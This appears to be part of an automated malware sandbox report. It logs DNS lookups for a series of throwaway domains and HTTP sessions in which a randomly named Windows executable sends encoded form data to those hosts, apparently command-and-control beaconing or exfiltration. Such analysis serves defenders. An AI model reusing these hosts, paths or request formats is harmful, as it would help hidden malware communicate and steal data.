Jan 11, 2025 09:24:22.894865990 CET	80	50010	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:22.894987106 CET	50010	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:22.910357952 CET	50010	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:22.915226936 CET	80	50010	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:24.423260927 CET	50010	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:24.428741932 CET	80	50010	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:24.428833008 CET	50010	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:25.443176985 CET	50011	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:25.448065042 CET	80	50011	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:25.448174953 CET	50011	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:25.463421106 CET	50011	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:25.468410969 CET	80	50011	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:26.970215082 CET	50011	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:26.975476027 CET	80	50011	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:26.978454113 CET	50011	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:27.989190102 CET	50012	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:27.994066000 CET	80	50012	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:27.994450092 CET	50012	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:28.009668112 CET	50012	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:28.014441013 CET	80	50012	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:28.014579058 CET	80	50012	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:30.188839912 CET	50012	80	192.168.2.8	85.159.66.93
Jan 11, 2025 09:24:30.193835020 CET	80	50012	85.159.66.93	192.168.2.8
Jan 11, 2025 09:24:30.193922043 CET	50012	80	192.168.2.8	85.159.66.93

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 09:21:59.840550900 CET	53599	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:22:00.829462051 CET	53599	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:22:01.004043102 CET	53	53599	1.1.1.1	192.168.2.8
Jan 11, 2025 09:22:01.004067898 CET	53	53599	1.1.1.1	192.168.2.8
Jan 11, 2025 09:22:17.004900932 CET	63401	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:22:17.018946886 CET	53	63401	1.1.1.1	192.168.2.8
Jan 11, 2025 09:22:30.224294901 CET	52167	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:22:30.984184027 CET	53	52167	1.1.1.1	192.168.2.8
Jan 11, 2025 09:22:44.568799019 CET	51696	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:22:44.589025974 CET	53	51696	1.1.1.1	192.168.2.8
Jan 11, 2025 09:22:58.068892956 CET	49697	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:22:58.082536936 CET	53	49697	1.1.1.1	192.168.2.8
Jan 11, 2025 09:23:06.147186041 CET	57383	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:23:06.158499002 CET	53	57383	1.1.1.1	192.168.2.8
Jan 11, 2025 09:23:19.458822966 CET	54561	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:23:19.540627003 CET	53	54561	1.1.1.1	192.168.2.8
Jan 11, 2025 09:23:32.880830050 CET	52023	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:23:33.258318901 CET	53	52023	1.1.1.1	192.168.2.8
Jan 11, 2025 09:23:46.849124908 CET	55357	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:23:47.279267073 CET	53	55357	1.1.1.1	192.168.2.8
Jan 11, 2025 09:24:01.223740101 CET	63635	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:24:01.344469070 CET	53	63635	1.1.1.1	192.168.2.8
Jan 11, 2025 09:24:14.645927906 CET	56319	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:24:14.690582991 CET	53	56319	1.1.1.1	192.168.2.8
Jan 11, 2025 09:24:22.786640882 CET	60795	53	192.168.2.8	1.1.1.1
Jan 11, 2025 09:24:22.887407064 CET	53	60795	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 09:21:59.840550900 CET	192.168.2.8	1.1.1.1	0xd100	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:00.829462051 CET	192.168.2.8	1.1.1.1	0xd100	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.004900932 CET	192.168.2.8	1.1.1.1	0xc52f	Standard query (0)	www.rafconstrutora.online	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:30.224294901 CET	192.168.2.8	1.1.1.1	0xb1b1	Standard query (0)	www.rtpnagitavip.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:44.568799019 CET	192.168.2.8	1.1.1.1	0x4d35	Standard query (0)	www.windsky.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:58.068892956 CET	192.168.2.8	1.1.1.1	0x3ffa	Standard query (0)	www.joube.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:06.147186041 CET	192.168.2.8	1.1.1.1	0x3fc5	Standard query (0)	www.luxuryliving.website	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:19.458822966 CET	192.168.2.8	1.1.1.1	0xd144	Standard query (0)	www.dating-apps-az-dn5.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:32.880830050 CET	192.168.2.8	1.1.1.1	0xd54e	Standard query (0)	www.tempatmudisini06.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:46.849124908 CET	192.168.2.8	1.1.1.1	0x8313	Standard query (0)	www.7261ltajbc.bond	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:24:01.223740101 CET	192.168.2.8	1.1.1.1	0x3dbc	Standard query (0)	www.mycleanupfiesta.live	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:24:14.645927906 CET	192.168.2.8	1.1.1.1	0xb9b9	Standard query (0)	www.uynline.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:24:22.786640882 CET	192.168.2.8	1.1.1.1	0xe675	Standard query (0)	www.soainsaat.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 09:22:01.004043102 CET	1.1.1.1	192.168.2.8	0xd100	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:22:01.004043102 CET	1.1.1.1	192.168.2.8	0xd100	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:22:01.004043102 CET	1.1.1.1	192.168.2.8	0xd100	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:01.004067898 CET	1.1.1.1	192.168.2.8	0xd100	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:22:01.004067898 CET	1.1.1.1	192.168.2.8	0xd100	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:22:01.004067898 CET	1.1.1.1	192.168.2.8	0xd100	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:17.018946886 CET	1.1.1.1	192.168.2.8	0xc52f	No error (0)	www.rafconstrutora.online		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:30.984184027 CET	1.1.1.1	192.168.2.8	0xb1b1	No error (0)	www.rtpnagitavip.xyz	rtpnagitavip.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:22:30.984184027 CET	1.1.1.1	192.168.2.8	0xb1b1	No error (0)	rtpnagitavip.xyz		172.96.191.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:44.589025974 CET	1.1.1.1	192.168.2.8	0x4d35	No error (0)	www.windsky.click		46.253.5.221	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:22:58.082536936 CET	1.1.1.1	192.168.2.8	0x3ffa	Server failure (2)	www.joube.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:06.158499002 CET	1.1.1.1	192.168.2.8	0x3fc5	No error (0)	www.luxuryliving.website		209.74.77.109	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:19.540627003 CET	1.1.1.1	192.168.2.8	0xd144	No error (0)	www.dating-apps-az-dn5.xyz		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:33.258318901 CET	1.1.1.1	192.168.2.8	0xd54e	No error (0)	www.tempatmudisini06.click	tempatmudisini06.click		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:23:33.258318901 CET	1.1.1.1	192.168.2.8	0xd54e	No error (0)	tempatmudisini06.click		103.21.221.4	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:23:47.279267073 CET	1.1.1.1	192.168.2.8	0x8313	No error (0)	www.7261ltajbc.bond		154.12.28.184	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:24:01.344469070 CET	1.1.1.1	192.168.2.8	0x3dbc	No error (0)	www.mycleanupfiesta.live		104.21.38.192	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:24:01.344469070 CET	1.1.1.1	192.168.2.8	0x3dbc	No error (0)	www.mycleanupfiesta.live		172.67.137.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 09:24:14.690582991 CET	1.1.1.1	192.168.2.8	0xb9b9	No error (0)	www.uynline.shop	uynline.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:24:22.887407064 CET	1.1.1.1	192.168.2.8	0xe675	No error (0)	www.soainsaat.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:24:22.887407064 CET	1.1.1.1	192.168.2.8	0xe675	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 09:24:22.887407064 CET	1.1.1.1	192.168.2.8	0xe675	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.yunlekeji.top

www.rafconstrutora.online

www.rtpnagitavip.xyz

www.windsky.click

www.luxuryliving.website

www.dating-apps-az-dn5.xyz

www.tempatmudisini06.click

www.7261ltajbc.bond

www.mycleanupfiesta.live

www.soainsaat.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	165.154.96.210	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:01.025820971 CET	465	OUT	GET /1e5v/?3DkHhn=LSevH1SlR8jKR63Sf3e6iJP8FgOuKv9VRJH5n/Y57ceZ6zxK2PAgiO3wYjZDkthnMdw+Rr81pHZPvK3KWmaSywZBPBYkXMXczB8dWZqH7PW/MoMlf4MIAK6HI0AhKSB4pw==&jH4x=86JHl HTTP/1.1 Host: www.yunlekeji.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:22:01.936825037 CET	565	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 11 Jan 2025 08:21:56 GMT Content-Length: 61 Location: http://m.yunlekeji.top/ X-Content-Type-Options: nosniff X-Download-Options: noopen X-XSS-Protection: 1; mode=block Cache-Flow: 7596928291 Origin-Agent-Cluster: ?0 FAI-W-FLOW: 556981038 FAI-W-AGENT-AID: 32663896 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 P3P: CP=CAO PSA OUR X-Permitted-Cross-Domain-Policies: none Server: F-WEB Data Raw: 54 68 65 20 55 52 4c 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 2e 79 75 6e 6c 65 6b 65 6a 69 2e 74 6f 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 0a Data Ascii: The URL has moved <a href="http://m.yunlekeji.top/">here</a>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	104.21.32.1	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:17.043891907 CET	748	OUT	POST /sa6l/ HTTP/1.1 Host: www.rafconstrutora.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.rafconstrutora.online Referer: http://www.rafconstrutora.online/sa6l/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 33 58 64 36 76 69 71 62 42 6e 39 58 66 62 32 6d 44 39 6e 6e 4f 39 30 30 79 69 6b 50 33 4c 51 79 47 78 45 35 48 30 46 62 35 7a 47 71 55 68 51 73 68 4a 7a 6e 68 58 58 79 79 2f 47 4b 2f 72 5a 6c 45 48 37 6f 38 64 38 2f 4a 67 74 45 77 4d 75 64 53 4b 58 6a 49 4f 2b 6b 4a 77 79 38 35 6a 44 75 43 49 67 4f 55 43 51 4d 44 79 74 69 45 73 6d 2f 6a 4c 6a 59 76 49 67 65 72 34 44 4b 6b 63 32 66 49 65 64 79 37 6c 54 32 78 38 6f 47 63 56 63 4b 67 68 51 61 70 4f 48 42 34 72 72 37 75 75 52 79 50 50 48 37 6d 6c 51 4b 74 61 66 75 76 65 6f 4e 46 30 58 51 75 4e 78 74 62 71 73 57 54 36 57 59 71 44 48 6e 74 4f 4d 3d Data Ascii: 3DkHhn=3Xd6viqbBn9Xfb2mD9nnO900yikP3LQyGxE5H0Fb5zGqUhQshJznhXXyy/GK/rZlEH7o8d8/JgtEwMudSKXjIO+kJwy85jDuCIgOUCQMDytiEsm/jLjYvIger4DKkc2fIedy7lT2x8oGcVcKghQapOHB4rr7uuRyPPH7mlQKtafuveoNF0XQuNxtbqsWT6WYqDHntOM=
Jan 11, 2025 09:22:17.552941084 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:22:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRODIRfizkCkgB5TKw2W1JuFE4Ua4eTV1kElkibAvZh6VK0eEsp2IdC3WXaXo3DyMtD%2FzaqBom8yDrxuTT47P4BnUE6lw5o%2Bd8aNGA3Ik7EHnAwB7w4hQ5hDnPQeYYgv9jTby11T5nwyVSFY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90037f86ff2f4344-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=45&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED] Data Ascii: 33fnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
Jan 11, 2025 09:22:17.552983046 CET	487	IN	Data Raw: 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d Data Ascii: 2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =
Jan 11, 2025 09:22:17.553210974 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	104.21.32.1	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:19.588128090 CET	768	OUT	POST /sa6l/ HTTP/1.1 Host: www.rafconstrutora.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.rafconstrutora.online Referer: http://www.rafconstrutora.online/sa6l/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 33 58 64 36 76 69 71 62 42 6e 39 58 4e 72 6d 6d 43 65 66 6e 49 64 30 33 2b 43 6b 50 35 72 51 70 47 77 34 35 48 78 6c 4c 35 42 69 71 55 41 67 73 67 4d 48 6e 6d 58 58 79 34 66 48 43 69 62 5a 2b 45 48 6d 58 38 64 41 2f 4a 6a 52 45 77 4d 65 64 53 34 2f 67 61 75 2b 6d 43 51 79 2b 33 44 44 75 43 49 67 4f 55 42 73 6d 44 79 31 69 45 39 57 2f 6a 70 47 71 78 59 67 64 69 59 44 4b 7a 4d 32 62 49 65 63 58 37 6b 2f 50 78 36 6b 47 63 55 73 4b 68 30 6b 62 6e 4f 48 48 32 4c 71 75 34 75 38 56 42 63 58 6a 6a 58 35 6c 75 4c 44 4e 71 6f 5a 6e 66 57 66 57 74 4e 5a 47 62 70 45 67 57 4e 4c 77 77 67 58 58 7a 5a 59 76 69 58 66 32 78 36 61 44 69 6e 6b 35 73 4f 62 62 35 6a 35 75 Data Ascii: 3DkHhn=3Xd6viqbBn9XNrmmCefnId03+CkP5rQpGw45HxlL5BiqUAgsgMHnmXXy4fHCibZ+EHmX8dA/JjREwMedS4/gau+mCQy+3DDuCIgOUBsmDy1iE9W/jpGqxYgdiYDKzM2bIecX7k/Px6kGcUsKh0kbnOHH2Lqu4u8VBcXjjX5luLDNqoZnfWfWtNZGbpEgWNLwwgXXzZYviXf2x6aDink5sObb5j5u
Jan 11, 2025 09:22:20.100411892 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:22:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8UguwgZtjFFAXxrJGfPNYE5hwnVMy62hgTv5mAr63gTP7MLvXd7aKRJbs%2B3nXifU5MPRy%2B0chwIyztvUU%2BM5ZfTGol9OFvGixnLpszYjET3UHeNpDTHe1nINDphZhZvfDOq5cVymtTiOEdPO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90037f96fe141875-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED] Data Ascii: 34bnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
Jan 11, 2025 09:22:20.100430012 CET	490	IN	Data Raw: e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 Data Ascii: 2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	104.21.32.1	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:22.147507906 CET	1785	OUT	POST /sa6l/ HTTP/1.1 Host: www.rafconstrutora.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.rafconstrutora.online Referer: http://www.rafconstrutora.online/sa6l/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 33 58 64 36 76 69 71 62 42 6e 39 58 4e 72 6d 6d 43 65 66 6e 49 64 30 33 2b 43 6b 50 35 72 51 70 47 77 34 35 48 78 6c 4c 35 42 71 71 55 54 34 73 68 76 76 6e 6e 58 58 79 6d 50 48 44 69 62 59 2b 45 48 2b 54 38 64 4d 76 4a 6c 64 45 78 74 2b 64 51 4d 72 67 44 65 2b 6d 4e 77 79 2f 35 6a 43 30 43 4a 51 4b 55 43 55 6d 44 79 31 69 45 2b 2b 2f 6c 37 69 71 7a 59 67 65 72 34 44 47 6b 63 32 2f 49 61 34 74 37 6b 4c 66 77 4b 45 47 63 30 38 4b 73 69 49 62 76 4f 48 46 78 4c 72 74 34 75 77 4b 42 63 4c 56 6a 53 73 34 75 4b 33 4e 6f 73 34 41 50 57 4b 4e 38 66 52 35 44 71 49 56 61 4e 61 63 7a 53 72 54 7a 75 34 57 6a 69 4b 59 38 49 57 41 68 46 35 41 2f 4c 71 4f 35 46 4d 4e 64 2b 54 6c 51 6e 46 33 70 2f 4a 67 72 2b 64 32 79 68 68 4b 51 71 6e 57 61 42 36 58 34 63 54 65 63 4d 4f 76 2f 64 6b 6c 4b 4b 2b 44 64 77 56 43 47 46 53 45 7a 31 54 79 30 74 73 4f 33 4f 63 62 46 76 39 70 75 4f 42 4c 5a 36 5a 44 48 75 42 61 41 2b 33 63 39 51 74 45 75 77 49 43 71 7a 2f 70 36 47 53 33 37 34 4a 70 6e 44 59 6b 58 69 68 [TRUNCATED] Data Ascii: 